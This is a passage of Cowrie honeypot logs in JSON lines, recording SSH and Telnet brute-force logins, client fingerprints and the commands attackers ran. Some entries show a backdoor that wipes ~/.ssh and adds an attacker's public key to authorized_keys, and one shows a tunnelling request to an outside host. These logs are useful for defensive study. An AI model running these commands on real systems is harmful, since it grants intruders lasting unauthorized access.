ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.993083Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:22:08.319438Z","src_ip":"212.227.235.229","session":"a9f6cd8f7ce4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:09.538478Z","src_ip":"212.227.235.229","session":"a9f6cd8f7ce4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52190,"dst_ip":"1.2.3.4","dst_port":22,"session":"87949fe13bb1","protocol":"ssh","message":"New connection: 212.227.235.229:52190 (1.2.3.4:22) [session: 87949fe13bb1]","sensor":"my-vps","timestamp":"2025-08-31T06:22:09.754874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:22:09.758522Z","src_ip":"212.227.235.229","session":"87949fe13bb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:22:09.975323Z","src_ip":"212.227.235.229","session":"87949fe13bb1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:22:10.850034Z","src_ip":"212.227.235.229","session":"87949fe13bb1"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:11.070508Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:11.071657Z","src_ip":"212.227.235.229","session":"87949fe13bb1"}
{"eventid":"cowrie.login.success","username":"root","password":"mudar","message":"login attempt [root/mudar] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:22:13.595826Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:22:20.102416Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T06:22:20.103195Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39802,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5196b8aa40d","protocol":"ssh","message":"New connection: 212.227.125.160:39802 (1.2.3.4:22) [session: c5196b8aa40d]","sensor":"my-vps","timestamp":"2025-08-31T06:22:21.146070Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:21.468447Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:21.469611Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54584,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffe4c2c175ff","protocol":"ssh","message":"New connection: 212.227.235.229:54584 (1.2.3.4:22) [session: ffe4c2c175ff]","sensor":"my-vps","timestamp":"2025-08-31T06:22:31.399061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:22:31.399925Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:22:31.702135Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.login.success","username":"root","password":"orange","message":"login attempt [root/orange] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:22:32.955203Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:22:33.572876Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:22:33.573546Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:22:33.574580Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:33.877470Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:22:34.955631Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:22:34.956462Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:22:35.263249Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:35.264213Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56036,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a664a7ca12d","protocol":"ssh","message":"New connection: 212.227.235.229:56036 (1.2.3.4:22) [session: 4a664a7ca12d]","sensor":"my-vps","timestamp":"2025-08-31T06:22:35.530390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:22:35.531369Z","src_ip":"212.227.235.229","session":"4a664a7ca12d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:22:35.827645Z","src_ip":"212.227.235.229","session":"4a664a7ca12d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:22:37.054362Z","src_ip":"212.227.235.229","session":"4a664a7ca12d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:38.354026Z","src_ip":"212.227.235.229","session":"4a664a7ca12d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57068,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4029b5e424c","protocol":"ssh","message":"New connection: 212.227.235.229:57068 (1.2.3.4:22) [session: c4029b5e424c]","sensor":"my-vps","timestamp":"2025-08-31T06:22:38.679905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:22:38.680832Z","src_ip":"212.227.235.229","session":"c4029b5e424c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:22:38.982701Z","src_ip":"212.227.235.229","session":"c4029b5e424c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:22:40.230000Z","src_ip":"212.227.235.229","session":"c4029b5e424c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:40.533191Z","src_ip":"212.227.235.229","session":"c4029b5e424c"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:40.534085Z","src_ip":"212.227.235.229","session":"ffe4c2c175ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40474,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb2afa7e581c","protocol":"ssh","message":"New connection: 212.227.235.229:40474 (1.2.3.4:22) [session: eb2afa7e581c]","sensor":"my-vps","timestamp":"2025-08-31T06:22:40.967099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:22:41.771482Z","src_ip":"212.227.235.229","session":"eb2afa7e581c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:22:41.772156Z","src_ip":"212.227.235.229","session":"eb2afa7e581c"}
{"eventid":"cowrie.session.closed","duration":"20.8","message":"Connection lost after 20.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:41.932319Z","src_ip":"212.227.125.160","session":"c5196b8aa40d"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":53772,"dst_ip":"1.2.3.4","dst_port":23,"session":"261fc2c51d22","protocol":"telnet","message":"New connection: 3.130.96.91:53772 (1.2.3.4:23) [session: 261fc2c51d22]","sensor":"my-vps","timestamp":"2025-08-31T06:22:47.369027Z"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"1234567","message":"login attempt [tomcat/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:22:47.921079Z","src_ip":"212.227.235.229","session":"eb2afa7e581c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:49.671854Z","src_ip":"212.227.235.229","session":"eb2afa7e581c"}
{"eventid":"cowrie.session.closed","duration":10.136357069015503,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:57.505330Z","src_ip":"3.130.96.91","session":"261fc2c51d22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58430,"dst_ip":"1.2.3.4","dst_port":22,"session":"b029ece5ebd4","protocol":"ssh","message":"New connection: 212.227.125.160:58430 (1.2.3.4:22) [session: b029ece5ebd4]","sensor":"my-vps","timestamp":"2025-08-31T06:23:01.990529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:23:02.474868Z","src_ip":"212.227.125.160","session":"b029ece5ebd4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:23:02.475811Z","src_ip":"212.227.125.160","session":"b029ece5ebd4"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:04.420529Z","src_ip":"212.227.235.229","session":"56bfb41fcec8"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"1234567","message":"login attempt [tomcat/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:23:04.631016Z","src_ip":"212.227.125.160","session":"b029ece5ebd4"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:23:06.207787Z","src_ip":"212.227.125.160","session":"b029ece5ebd4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23126,"dst_ip":"1.2.3.4","dst_port":22,"session":"858d91a76ab2","protocol":"ssh","message":"New connection: 77.83.207.83:23126 (1.2.3.4:22) [session: 858d91a76ab2]","sensor":"my-vps","timestamp":"2025-08-31T06:23:07.653236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:23:07.654205Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T06:23:07.704699Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:23:07.958549Z","src_ip":"77.83.207.83","session":"858d91a76ab2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":155,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:155","sensor":"my-vps","timestamp":"2025-08-31T06:23:08.009877Z","session":"858d91a76ab2"}
